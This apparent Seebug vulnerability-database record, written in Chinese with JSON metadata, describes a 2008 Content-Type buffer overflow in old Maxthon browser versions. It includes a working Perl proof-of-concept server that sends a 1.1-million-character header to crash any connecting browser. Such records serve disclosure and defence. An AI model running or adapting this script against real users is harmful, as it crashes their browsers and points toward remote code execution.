Maxthon Browser Content-Type缓冲区溢出漏洞

2008-08-11T00:00:00

Description

BUGTRAQ ID: 30617 CNCAN ID：CNCAN-2008081108 Maxthon Browser是一款国内非常流行的WEB浏览器。 Maxthon Browser不正确处理Content-Type字段数据，远程攻击者可以利用漏洞以应用程序权限执行任意指令。构建包含超长字符串的Content-Type应答提供给Maxthon浏览器解析，可导致触发缓冲区溢出而崩溃，存在执行任意指令可能。 Maxthon Maxthon 1.2.1 Maxthon Maxthon 1.2 Maxthon Maxthon 1.1.39 Maxthon Maxthon 1.6.3.80 目前没有解决方案提供： <a href=http://www.maxthon.com/ target=_blank>http://www.maxthon.com/</a>

{"href": "https://www.seebug.org/vuldb/ssvid-3810", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2008-08-11T00:00:00", "title": "Maxthon Browser Content-Type\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-3810", "cvelist": [], "description": "BUGTRAQ ID: 30617\r\nCNCAN ID\uff1aCNCAN-2008081108\r\n\r\nMaxthon Browser\u662f\u4e00\u6b3e\u56fd\u5185\u975e\u5e38\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nMaxthon Browser\u4e0d\u6b63\u786e\u5904\u7406Content-Type\u5b57\u6bb5\u6570\u636e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u6784\u5efa\u5305\u542b\u8d85\u957f\u5b57\u7b26\u4e32\u7684Content-Type\u5e94\u7b54\u63d0\u4f9b\u7ed9Maxthon\u6d4f\u89c8\u5668\u89e3\u6790\uff0c\u53ef\u5bfc\u81f4\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u800c\u5d29\u6e83\uff0c\u5b58\u5728\u6267\u884c\u4efb\u610f\u6307\u4ee4\u53ef\u80fd\u3002\n\nMaxthon Maxthon 1.2.1 \r\nMaxthon Maxthon 1.2 \r\nMaxthon Maxthon 1.1.39 \r\nMaxthon Maxthon 1.6.3.80\n \u76ee\u524d\u6ca1\u6709\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\n<a href=http://www.maxthon.com/ target=_blank>http://www.maxthon.com/</a>", "viewCount": 9, "published": "2008-08-11T00:00:00", "sourceData": "\n #!/usr/bin/perl # Maxthon Browser << 2.0 Stack Overflow Crash # Descoverd by DATA_SNIPER # Usage: #connect from maxthon browser to http:/127.0.0.1/\r\nuse IO::Socket;\r\nmy $sock=new IO::Socket::INET (\r\nListen => 1,\r\nLocalAddr => 'localhost',\r\nLocalPort => 80,\r\nProto =>\r\n'tcp'); die unless $sock;\r\n$huge="A" x 1100000;\r\n$|=1; print "===================================================================\\n";\r\nprint " Mawthon Browser << 2.0 Stack Overflow Crash\\n";\r\nprint " Bug Descoverd by DATA_SNIPER\\n";\r\nprint " GreetZ To:Alpha_Hunter,Pirat Digital,Xodia,DelataAzize,AT4RE Team,all algerian hackers\\n";\r\nprint " Mail me at:Alpha_three3333(at)yahoo(dot)com\\n"; print " BigGreetZ To: www.at4re.com,www.crownhacker.com\\n";\r\nprint"===================================================================\\n"; print " [+] HTTP Server started on port 70... \\n";\r\nprint" [+]Try IExplore http://127.0.0.1/ \\n";\r\n$z=$sock->accept(); print " [+]connection\r\nAccepted!\\n";\r\ndo\r\n{\r\n$ln=<$z>;\r\n\r\nprint $ln;\r\nchomp $ln;\r\n\r\nif (($ln eq "")||($ln eq "\\n")||($ln eq "\\r"))\r\n{\r\nprint " [<>]Sending Evil Packet\\n";\r\nprint $z " HTTP/1.1 200 OK\\r\\nServer: bugs 3.1.02\\r\\nContent-Type: $huge\\r\\nConnection: close\\r\\n\\r\\ndone";\r\nclose($z);\r\nexit;\r\n}\r\n} while (true);\r\n\n ", "id": "SSV:3810", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:32:15", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645225920, "score": 1659785532, "epss": 1678851499}}